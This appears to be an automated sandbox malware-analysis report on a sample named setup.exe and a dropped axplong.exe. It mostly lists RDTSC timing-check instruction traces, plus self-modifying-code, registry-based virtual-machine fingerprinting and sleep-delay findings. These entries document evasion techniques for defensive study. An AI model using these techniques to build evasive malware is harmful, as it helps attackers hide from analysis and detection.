Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AA0136 second address: 4AA017A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 pushfd 0x00000006 jmp 00007F808D280535h 0x0000000b or ah, FFFFFFA6h 0x0000000e jmp 00007F808D280531h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F808D28052Dh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AA017A second address: 4AA0180 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AA0180 second address: 4AA0184 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AA0184 second address: 4AA01A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F808D4B80C2h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AA01A3 second address: 4AA01A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AA01A9 second address: 4AA01AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AA01AD second address: 4AA01CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+0Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F808D280534h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AC09B4 second address: 4AC09E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D4B80C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F808D4B80C4h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AC09E6 second address: 4AC0A45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F808D280531h 0x00000009 add eax, 7C65DCB6h 0x0000000f jmp 00007F808D280531h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov eax, 4EAC94B5h 0x00000021 pushfd 0x00000022 jmp 00007F808D280532h 0x00000027 or eax, 7DBC4708h 0x0000002d jmp 00007F808D28052Bh 0x00000032 popfd 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AC0A45 second address: 4AC0A4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AC0A4B second address: 4AC0A4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AC0533 second address: 4AC0550 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D4B80C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AC0550 second address: 4AC057C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 37BE8EB2h 0x00000008 jmp 00007F808D280533h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xchg eax, ebp 0x00000011 pushad 0x00000012 mov al, D8h 0x00000014 mov ecx, edi 0x00000016 popad 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AC057C second address: 4AC0580 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AC0580 second address: 4AC058F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D28052Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AC058F second address: 4AC05A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F808D4B80C4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AC05A7 second address: 4AC05AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AC05AB second address: 4AC05E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F808D4B80C7h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F808D4B80C5h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AC0299 second address: 4AC029D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AC029D second address: 4AC02A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AC02A1 second address: 4AC02A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AC02A7 second address: 4AC02BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D4B80BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov eax, edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AC02BE second address: 4AC02C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AC02C3 second address: 4AC02C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AC02C9 second address: 4AC02CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AC02CD second address: 4AC02D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AC02D1 second address: 4AC02E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov eax, 54A68A61h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AC02E3 second address: 4AC02E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AC02E9 second address: 4AC02ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AD0008 second address: 4AD000E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AD000E second address: 4AD0089 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D280532h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov cl, A6h 0x0000000d mov dx, 819Eh 0x00000011 popad 0x00000012 push eax 0x00000013 jmp 00007F808D280534h 0x00000018 xchg eax, ebp 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F808D28052Eh 0x00000020 xor ecx, 27275B98h 0x00000026 jmp 00007F808D28052Bh 0x0000002b popfd 0x0000002c pushad 0x0000002d call 00007F808D280536h 0x00000032 pop ecx 0x00000033 mov al, dl 0x00000035 popad 0x00000036 popad 0x00000037 mov ebp, esp 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AD0089 second address: 4AD008F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AD008F second address: 4AD0095 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AD0095 second address: 4AD0099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B00629 second address: 4B00650 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D28052Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F808D280535h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B00650 second address: 4B00674 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D4B80C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F808D4B80BCh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B00674 second address: 4B0069B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D28052Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F808D280535h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B0069B second address: 4B006AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F808D4B80BCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B006AB second address: 4B006D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D28052Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F808D280535h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B006D5 second address: 4B006E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F808D4B80BCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4B006E5 second address: 4B006F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d pop ebx 0x0000000e mov ebx, esi 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AE010A second address: 4AE0127 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D4B80C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AE0127 second address: 4AE0187 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F808D280537h 0x00000009 sbb ax, 8B7Eh 0x0000000e jmp 00007F808D280539h 0x00000013 popfd 0x00000014 mov ecx, 754EF1C7h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d jmp 00007F808D28052Ah 0x00000022 push eax 0x00000023 jmp 00007F808D28052Bh 0x00000028 xchg eax, ebp 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AE0187 second address: 4AE018B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AE018B second address: 4AE018F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AE018F second address: 4AE0195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AE0195 second address: 4AE019B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AE019B second address: 4AE019F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AE019F second address: 4AE01A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AE01A3 second address: 4AE01E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b pushad 0x0000000c movzx esi, bx 0x0000000f pushfd 0x00000010 jmp 00007F808D4B80C9h 0x00000015 and al, 00000076h 0x00000018 jmp 00007F808D4B80C1h 0x0000001d popfd 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 mov cl, B9h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AE01E6 second address: 4AE0223 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [ebp+08h] 0x0000000a pushad 0x0000000b mov cx, bx 0x0000000e push edx 0x0000000f pushfd 0x00000010 jmp 00007F808D28052Ch 0x00000015 jmp 00007F808D280535h 0x0000001a popfd 0x0000001b pop eax 0x0000001c popad 0x0000001d and dword ptr [eax], 00000000h 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AE0223 second address: 4AE0227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AE0227 second address: 4AE022D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AE022D second address: 4AE0287 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 pushfd 0x00000007 jmp 00007F808D4B80BDh 0x0000000c adc ax, A496h 0x00000011 jmp 00007F808D4B80C1h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a and dword ptr [eax+04h], 00000000h 0x0000001e jmp 00007F808D4B80BEh 0x00000023 pop ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F808D4B80C7h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AE0287 second address: 4AE029F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F808D280534h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AE029F second address: 4AE02A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AC0402 second address: 4AC041A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F808D280534h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AC041A second address: 4AC041E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AD0C5D second address: 4AD0CB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F808D280535h 0x00000013 or ax, 7896h 0x00000018 jmp 00007F808D280531h 0x0000001d popfd 0x0000001e mov ch, 59h 0x00000020 popad 0x00000021 pop ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F808D280536h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AD0E5D second address: 4AD0E61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AD0E61 second address: 4AD0E67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AD0E67 second address: 4AD0E8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D4B80C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f mov ecx, 61E5F949h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AF0D74 second address: 4AF0D78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AF0D78 second address: 4AF0D7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AF0D7E second address: 4AF0D8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F808D28052Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AF0D8D second address: 4AF0DA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F808D4B80BBh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AF0DA3 second address: 4AF0DE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D280539h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F808D28052Eh 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 pushad 0x00000013 push eax 0x00000014 pop edx 0x00000015 mov ch, 2Bh 0x00000017 popad 0x00000018 mov ax, dx 0x0000001b popad 0x0000001c push esp 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov cx, dx 0x00000023 pushad 0x00000024 popad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AF0DE6 second address: 4AF0DEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AF0DEC second address: 4AF0DF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AF0DF0 second address: 4AF0E12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F808D4B80C5h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AF0E12 second address: 4AF0E8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 mov edx, ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [76FB65FCh] 0x00000010 jmp 00007F808D280532h 0x00000015 test eax, eax 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F808D28052Eh 0x0000001e sub cl, FFFFFF98h 0x00000021 jmp 00007F808D28052Bh 0x00000026 popfd 0x00000027 mov cx, 584Fh 0x0000002b popad 0x0000002c je 00007F80FF6C3032h 0x00000032 jmp 00007F808D280532h 0x00000037 mov ecx, eax 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F808D280537h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AF0E8D second address: 4AF0EB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D4B80C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor eax, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F808D4B80BAh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AF0EB9 second address: 4AF0F25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 movsx ebx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and ecx, 1Fh 0x0000000e pushad 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F808D280532h 0x00000016 adc cx, 6418h 0x0000001b jmp 00007F808D28052Bh 0x00000020 popfd 0x00000021 call 00007F808D280538h 0x00000026 pop eax 0x00000027 popad 0x00000028 jmp 00007F808D28052Bh 0x0000002d popad 0x0000002e ror eax, cl 0x00000030 pushad 0x00000031 mov ebx, eax 0x00000033 pushad 0x00000034 movsx ebx, si 0x00000037 popad 0x00000038 popad 0x00000039 leave 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AF0F25 second address: 4AF0F36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D4B80BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4AF0F36 second address: 4AF0F4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 movsx edi, si 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c retn 0004h 0x0000000f nop 0x00000010 mov esi, eax 0x00000012 lea eax, dword ptr [ebp-08h] 0x00000015 xor esi, dword ptr [003C2014h] 0x0000001b push eax 0x0000001c push eax 0x0000001d push eax 0x0000001e lea eax, dword ptr [ebp-10h] 0x00000021 push eax 0x00000022 call 00007F80919F149Bh 0x00000027 push FFFFFFFEh 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\setup.exe	Special instruction interceptor: First address: 3CE901 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\setup.exe	Special instruction interceptor: First address: 5A3DA0 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\setup.exe	Special instruction interceptor: First address: 57EB7D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\setup.exe	Special instruction interceptor: First address: 60F6E0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Special instruction interceptor: First address: 106E901 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Special instruction interceptor: First address: 1243DA0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Special instruction interceptor: First address: 121EB7D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Special instruction interceptor: First address: 12AF6E0 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\setup.exe

Code function: 0_2_04B2034E rdtsc

0_2_04B2034E

Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Thread delayed: delay time: 180000

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Window / User API: threadDelayed 1248	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Window / User API: threadDelayed 966	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Window / User API: threadDelayed 1029	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Window / User API: threadDelayed 1342	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 7588	Thread sleep count: 1248 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 7588	Thread sleep time: -2497248s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 7584	Thread sleep count: 966 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 7584	Thread sleep time: -1932966s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 7604	Thread sleep count: 1029 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 7604	Thread sleep time: -2059029s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 7552	Thread sleep count: 325 > 30	Jump to behavior
